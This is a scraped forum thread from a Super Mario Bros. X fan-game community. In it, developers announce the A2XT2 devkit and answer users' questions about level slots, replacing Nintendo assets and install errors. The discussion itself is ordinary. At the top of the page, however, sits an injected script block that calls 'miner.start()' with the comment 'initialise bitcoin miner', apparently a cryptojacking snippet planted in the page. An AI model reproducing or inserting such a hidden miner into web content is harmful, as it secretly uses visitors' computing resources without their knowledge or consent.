<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

A2XT2 DEVKIT

The second SMBX collab!
User avatar
Hoeloe
A2XT person
Posts: 926
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

A2XT2 DEVKIT

Postby Hoeloe » 2 weeks ago

Hey there everyone!

Wow it's been a heck of a road to get to this point. Lots of changing tech, huge overhauls in how various communities are structured, all sorts of stuff. It's become a bit of a meme that A2XT is perpetually on hold.

The truth is, it's never been on hold, there's just been a TON of work going on quietly to keep pace with changing technology, and give it some serious production values. And now, it's finally time to enter the next stage:

The A2XT2 Devkit is ready to roll!

Before we get to the download links, just a quick rundown of how this will work. There's been a lot of planning done for worlds, towns, bosses, themes, and even the entire story has been planned out. The majority of the levels have been in place for a long time, there are just a few left over that need to be made, and there are a few guidelines for that.

------
I want to make a new level
Great! Because of all the planning we've done, there are a few slots available with specific themes, but we can't just accommodate the "make anything and we'll find space" attitude that we did before. These slots aren't hard-and-fast, but they are places where the game currently has "gaps" that we'd like to see filled. There is a spreadsheet of current levels, but if you would rather avoid spoilers, you would be best to talk to the core devteam about reserving a slot. Should you wish to look at the available slots, though, the spreadsheet is here: https://docs.google.com/spreadsheets/d/ ... jpyBngz2k/

When making a new level in the editor, to ensure you're working within the devkit, you should save the level as soon as possible into your devkit episode folder, and then reload PGE's configuration pack (just restarting PGE will work). This ties your level to the episode and activates all of the episode code for it.

I made a level a million years ago and I want to revisit it
This is fine, but because of some changes to technology and other structures, even if you still have a copy of your level we can't guarantee that the "current" version we have is the same. If you want to revisit your old level, let someone on the core devteam know, and we'll see about sending the currently "up to date" copy.

I want to make a town/boss/story scene
Please refer to the relevant handbook:
Town Guide
Boss Guide
Message System Guide
Cutscene Guide
Testing and Debugging Guide


------
And with that, all that's left is the download links! There are two links available, one for the devkit itself, and one containing several levels, including the game's opening. These levels can be used for reference, but should be avoided if you are intending to experience the game spoiler-free.

Image
Image
Image
Image
Image

TiKi
Posts: 30
Joined: 6 years ago

Re: A2XT2 DEVKIT

Postby TiKi » 1 week ago

I'm asking in the devkit thread because it's asset-related and I'm not sure if this deserves its own thread, so here I go...

So the devkit is replacing all of the Nintendo assets, right? Does that mean that A2XT will be a "copyright-free game" or will there still be graphics and music from Nintendo games allowed?

User avatar
Hoeloe
A2XT person
Posts: 926
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: A2XT2 DEVKIT

Postby Hoeloe » 6 days ago

Not quite. The devkit replaces most nintendo assets but there are still a few left in there.

The aim is for episode 3 to hopefully remove all nintendo assets so the game can stand on its own.
Image
Image
Image
Image
Image

User avatar
ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Posts: 562
Joined: 6 years ago
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Re: A2XT2 DEVKIT

Postby ztarwuff » 2 days ago

I'll definitely need to go over my levels again, and especially the World 6 Castle level I was working on. The latter is a retread of every World 6 level, so when you're done with qqqqqq, I need a copy to see what can be incorporated into it.

One question, though: How does this Devkit work? Do I download a copy of SMBX2 and overwrite the files with this? Also, I put some levels into a World folder to see what changes you've made, but none of the assets would load.

Enjl
Posts: 416
Joined: 5 years ago

Re: A2XT2 DEVKIT

Postby Enjl » 2 days ago

ztarwuff wrote: I'll definitely need to go over my levels again, and especially the World 6 Castle level I was working on. The latter is a retread of every World 6 level, so when you're done with qqqqqq, I need a copy to see what can be incorporated into it.

One question, though: How does this Devkit work? Do I download a copy of SMBX2 and overwrite the files with this? Also, I put some levels into a World folder to see what changes you've made, but none of the assets would load.
I believe it's just an episode folder for A2XT2. No replacements of basegame assets necessary.

User avatar
SAJewers
hi
Posts: 3296
Joined: 7 years ago
Location: Nova Scotia

Re: A2XT2 DEVKIT

Postby SAJewers » 2 days ago

Ye\ah, just chuck everything in the worlds folder, and throw your levels inside.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Isrieri
Creatively Bankrupt
Posts: 83
Joined: 6 years ago
Pronouns: Male

Re: A2XT2 DEVKIT

Postby Isrieri » 2 days ago

I just got word of this and I had a nostalgia shock. I completely forgot all about this.

I love the new graphics and assets for the devkit. The Demo crew in particular have lovely new sprites that make them pop off the screen more, and my favorite thing about these ASMT-themed things is the amazing spritework. Some of the new stuff is kind of perplexing like the NPCs in the actors tab, but this is a tremendous amount of work and its just kinda being plopped here so I want to say thanks for this impressive overhaul.

I only made one stage and I still think its pretty alright even with old & busted autoscroll.

User avatar
ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Posts: 562
Joined: 6 years ago
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Re: A2XT2 DEVKIT

Postby ztarwuff » 1 day ago

SAJewers wrote: Ye\ah, just chuck everything in the worlds folder, and throw your levels inside.
Well, I must be doing something incredibly wrong, because all the configuration luas keep returning a nil value error.

Image

I'm using SMBX 2.0 Beta 4 and I've tried putting it into an A2XT folder within Worlds and directly into the Worlds folder. I get nil value error both times. I've tried installing it in a folder that isn't Onedrive, and I still get them.

User avatar
SAJewers
hi
Posts: 3296
Joined: 7 years ago
Location: Nova Scotia

Re: A2XT2 DEVKIT

Postby SAJewers » 1 day ago

Isrieri wrote: I just got word of this and I had a nostalgia shock. I completely forgot all about this.

I love the new graphics and assets for the devkit. The Demo crew in particular have lovely new sprites that make them pop off the screen more, and my favorite thing about these ASMT-themed things is the amazing spritework. Some of the new stuff is kind of perplexing like the NPCs in the actors tab, but this is a tremendous amount of work and its just kinda being plopped here so I want to say thanks for this impressive overhaul.

I only made one stage and I still think its pretty alright even with old & busted autoscroll.
I mean, there are I believe still levels that need to be made (though mainly things like towns afaik), and I'm sure the team could use help fixing up some older levels whose authors aren't around anymore.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Hoeloe
A2XT person
Posts: 926
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: A2XT2 DEVKIT

Postby Hoeloe » 1 day ago

I'm not convinced you're using Beta 4 if that's your error. Are you sure you aren't using MAGLX3 or PAL?
Image
Image
Image
Image
Image

User avatar
Isrieri
Creatively Bankrupt
Posts: 83
Joined: 6 years ago
Pronouns: Male

Re: A2XT2 DEVKIT

Postby Isrieri » 1 day ago

SAJewers wrote: I mean, there are I believe still levels that need to be made (though mainly things like towns afaik), and I'm sure the team could use help fixing up some older levels whose authors aren't around anymore.
Just looking at Temporis alone I don't think I'm anywhere close to qualified to make any towns but I'm game for fixing up levels. What sort of work do you need done? When I peeked at the level list it seems to me everything's either being claimed or is complete?

User avatar
Hoeloe
A2XT person
Posts: 926
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: A2XT2 DEVKIT

Postby Hoeloe » 1 day ago

Isrieri wrote:
SAJewers wrote: I mean, there are I believe still levels that need to be made (though mainly things like towns afaik), and I'm sure the team could use help fixing up some older levels whose authors aren't around anymore.
Just looking at Temporis alone I don't think I'm anywhere close to qualified to make any towns but I'm game for fixing up levels. What sort of work do you need done? When I peeked at the level list it seems to me everything's either being claimed or is complete?
There's still a few special level slots that haven't been claimed, so if you wanted to, you could work on one of those. Aside from that, it's basically building cutscenes, bosses, getting the hub sorted out, building world maps, and polishing up all the existing levels.

Also, if you do want to take a town, there's plenty of people who can help work you through it, so don't worriy if you don't feel up to the tech side.
Image
Image
Image
Image
Image

User avatar
ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Posts: 562
Joined: 6 years ago
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Re: A2XT2 DEVKIT

Postby ztarwuff » 14 hours ago

Hoeloe wrote: I'm not convinced you're using Beta 4 if that's your error. Are you sure you aren't using MAGLX3 or PAL?
Finally got it to work. Turns out I still had an old copy of PGE floating around and had to break the file association with the old one and reassign lvl files to the new one.

I see the devkit is overwriting my custom NPC graphics for my old copy of the levels. Something to do with overwriting the basegame graphics with the A2XT graphics, I'm presuming.

User avatar
Hoeloe
A2XT person
Posts: 926
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: A2XT2 DEVKIT

Postby Hoeloe » 11 hours ago

ztarwuff wrote:
Hoeloe wrote: I'm not convinced you're using Beta 4 if that's your error. Are you sure you aren't using MAGLX3 or PAL?
Finally got it to work. Turns out I still had an old copy of PGE floating around and had to break the file association with the old one and reassign lvl files to the new one.

I see the devkit is overwriting my custom NPC graphics for my old copy of the levels. Something to do with overwriting the basegame graphics with the A2XT graphics, I'm presuming.
It... shouldn't be doing that. Custom graphics should work perfectly fine. I will say that old copies of the levels are very much NOT guaranteed to work or be at all what we have now in the current build. We did a lot of polishing and tweaking to make things work, so if you want to go back to your old levels, we can give you a copy of what we have.
Image
Image
Image
Image
Image

Rockythechao
the figure of Kevka's bear was a sightseeing
Posts: 1000
Joined: 5 years ago
First name: Michael
Pronouns: he/they
Location: Yes

Re: A2XT2 DEVKIT

Postby Rockythechao » 3 hours ago

Honestly the copy we have on the full game's repo is similarly broken. We haven't gotten to w6 with our technical/asset review yet, but since you asked about it here I checked and found it has both the broken graphics and leftover code and content for the boss; the latter's since been split off into its own level like the game's other boss fights.

I've started working on removing that stuff and implementing a cleaner, file structure-based setup for the main gimmick (so you'll be able to make a subfolder for each style and then just call a function to make the swap). I'll send it your way as soon as I'm done, though this week is going to be busy for me irl so it may be this weekend at the earliest.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

Image

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

User avatar
ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Posts: 562
Joined: 6 years ago
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Re: A2XT2 DEVKIT

Postby ztarwuff » 2 hours ago

Hoeloe wrote:
ztarwuff wrote:
Hoeloe wrote: I'm not convinced you're using Beta 4 if that's your error. Are you sure you aren't using MAGLX3 or PAL?
Finally got it to work. Turns out I still had an old copy of PGE floating around and had to break the file association with the old one and reassign lvl files to the new one.

I see the devkit is overwriting my custom NPC graphics for my old copy of the levels. Something to do with overwriting the basegame graphics with the A2XT graphics, I'm presuming.
It... shouldn't be doing that. Custom graphics should work perfectly fine. I will say that old copies of the levels are very much NOT guaranteed to work or be at all what we have now in the current build. We did a lot of polishing and tweaking to make things work, so if you want to go back to your old levels, we can give you a copy of what we have.
Yes, I'll definitely need to review all my levels and ALL the World 6 levels. With Willhart's levels gone, I need to remove the Willhart-themed section from my castle level, and replace it with a qqqqq-themed section. Thanks.

I'll look into seeing what's causing the custom graphics thing. Perhaps I misunderstood what was meant by chucking a level into the worlds folder.


Return to “A2XT”

Who is online

Users browsing this forum: No registered users and 5 guests